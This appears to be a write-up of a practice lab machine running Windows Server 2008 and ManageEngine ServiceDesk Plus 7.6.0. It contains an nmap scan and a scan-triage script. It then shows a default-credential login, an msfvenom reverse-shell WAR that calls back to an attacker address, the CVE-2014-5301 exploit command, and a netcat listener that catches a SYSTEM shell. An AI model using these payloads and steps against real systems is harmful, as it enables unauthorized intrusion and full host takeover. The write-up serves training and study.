# Helpdesk

`ManageEngine`

* Machine name: Helpdesk
* Difficulty: Easy
* OS: Windows

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-24 03:57 EDT
Stats: 0:01:34 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 76.42% done; ETC: 03:59 (0:00:29 remaining)
Nmap scan report for 192.168.212.43
Host is up (0.033s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
|_http-server-header: Apache-Coyote/1.1
|_http-title: ManageEngine ServiceDesk Plus
Service Info: Host: HELPDESK; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

Host script results:
| smb2-time: 
|   date: 2024-07-24T07:59:57
|_  start_date: 2024-07-24T07:57:00
| smb-os-discovery: 
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: HELPDESK
|   NetBIOS computer name: HELPDESK\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-07-24T00:59:57-07:00
| smb2-security-mode: 
|   2:0:2: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: HELPDESK, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:9e:f3:30 (VMware)
|_clock-skew: mean: 2h19m59s, deviation: 4h02m29s, median: 0s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.53 seconds
```
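The scan above already contains the findings a defender would want flagged before anyone gets as far as the web application: an end-of-life Windows Server 2008 banner, SMB signing disabled, guest SMB access, RDP exposed, and a session cookie without HttpOnly on the ServiceDesk Plus port. The following Python script is an added example and not part of the original write-up; it parses normal Nmap text output (a constructed excerpt of this page's scan is embedded as sample input) and turns those lines into a triage list, so the same checks can be run over any saved `nmap -sV -sC` output.

```python
"""Triage normal Nmap text output for weak-configuration findings.

Added example, not part of the original write-up. SAMPLE_SCAN is a
constructed excerpt of the scan output shown on this page.
"""
import re

SAMPLE_SCAN = """\
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
8080/tcp open  http          Apache Tomcat/Coyote JSP engine 1.1
| http-cookie-flags:
|   /:
|     JSESSIONID:
|_      httponly flag not set
|_http-title: ManageEngine ServiceDesk Plus
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
"""

# One port line of "normal" Nmap output: "445/tcp  open  microsoft-ds  <version>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

# Product banners whose vendor support has ended. Windows Server 2008
# left extended support in January 2020.
EOL_BANNERS = {
    "Windows Server (R) 2008": "extended support ended January 2020",
}

SEVERITY_RANK = {"info": 0, "low": 1, "medium": 2, "high": 3}


def parse_ports(text):
    """Return a list of dicts for every port line in the scan text."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
            })
    return ports


def triage(text):
    """Return (severity, finding) tuples for the weak settings in the scan."""
    findings = []
    for p in parse_ports(text):
        if p["state"] != "open":
            continue
        for banner, note in EOL_BANNERS.items():
            if banner in p["version"]:
                findings.append(("high", f"{p['port']}/{p['proto']}: end-of-life OS banner ({note})"))
        if p["port"] == 3389 and p["proto"] == "tcp":
            findings.append(("medium", "3389/tcp: RDP reachable from the scanning host"))
    # Script output (smb-security-mode, http-cookie-flags) is host- or
    # service-wide, so it is matched on the whole text rather than per port.
    if re.search(r"message_signing:\s*disabled", text):
        findings.append(("medium", "SMB message signing disabled (relay risk)"))
    if re.search(r"account_used:\s*guest", text):
        findings.append(("medium", "SMB guest access accepted"))
    if "httponly flag not set" in text:
        findings.append(("low", "session cookie served without the HttpOnly flag"))
    if "ManageEngine ServiceDesk Plus" in text:
        findings.append(("info", "ManageEngine ServiceDesk Plus exposed: confirm version and that default credentials were changed"))
    return findings


def max_severity(findings):
    """Highest severity present, or None when there are no findings."""
    if not findings:
        return None
    return max((s for s, _ in findings), key=SEVERITY_RANK.__getitem__)


if __name__ == "__main__":
    for severity, finding in triage(SAMPLE_SCAN):
        print(f"[{severity:6}] {finding}")
```

Run it as `python3 triage.py` to see the list for the embedded sample, or replace `SAMPLE_SCAN` with the contents of a saved `-oN` file. Matching the NSE script lines on the whole text rather than per port keeps the parser simple; a multi-host file would need the `Nmap scan report for` lines as section boundaries.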

### HTTP (8080) : Apache Tomcat/Coyote JSP engine 1.1

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FDA1EuW8jFyMR6bvLtZ1h%2Fb48ffaaa67698ba3fe2133e4a5752665.png?alt=media&#x26;token=a928cf78-3bde-4459-9cd4-d2ff9c5146d3" alt=""><figcaption></figcaption></figure>

ManageEngine ServiceDesk Plus | 7.6.0

A Google search turns up the default credentials for this product. administrator:administrator works.

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FfO1YGRwSKDVb5lXvRAUE%2F68109daded8d0ffd96a87e98246fde1c.png?alt=media&#x26;token=31dab99c-b89b-4431-b0b4-3738900849f2" alt=""><figcaption></figcaption></figure>

Next we look for an exploit matching this version of ManageEngine:

{% embed url="https://github.com/PeterSufliarsky/exploits/blob/master/CVE-2014-5301.py" %}

## Initial access

### ManageEngine Exploit

We copy the exploit from the repository above, generate a reverse-shell .war, and run the exploit.

```
┌──(kali㉿kali)-[~]
└─$ msfvenom -p java/shell_reverse_tcp LHOST=192.168.45.217 LPORT=4444 -f war > shell.war
Payload size: 12808 bytes
Final size of war file: 12808 bytes
```

```
┌──(kali㉿kali)-[~]
└─$ python exploit.py 192.168.212.43 8080 administrator administrator shell.war
/home/kali/.local/lib/python3.11/site-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.7) or chardet (5.2.0)/charset_normalizer (2.0.9) doesn't match a supported version!
  warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
Trying http://192.168.212.43:8080/4EXEqNov111Qqug9BApdBJ4yOUAkdBIy/xpiguygtw/gPIquvKX8AFoGmtp
Trying http://192.168.212.43:8080/4EXEqNov111Qqug9BApdBJ4yOUAkdBIy/xpiguygtw/uDfRC1k6eYAREORM
Trying http://192.168.212.43:8080/4EXEqNov111Qqug9BApdBJ4yOUAkdBIy/xpiguygtw/EO5c4l6t6Z2NlwfX
```

Start the listener before running the exploit:

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.212.43] 49182
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\ManageEngine\ServiceDesk\bin>whoami
whoami
nt authority\system
C:\ManageEngine\ServiceDesk\bin>cd /users/administrator/desktop
C:\Users\Administrator\Desktop>type proof.txt
```

We land directly as nt authority\system, since the ServiceDesk Plus service itself runs under that account.
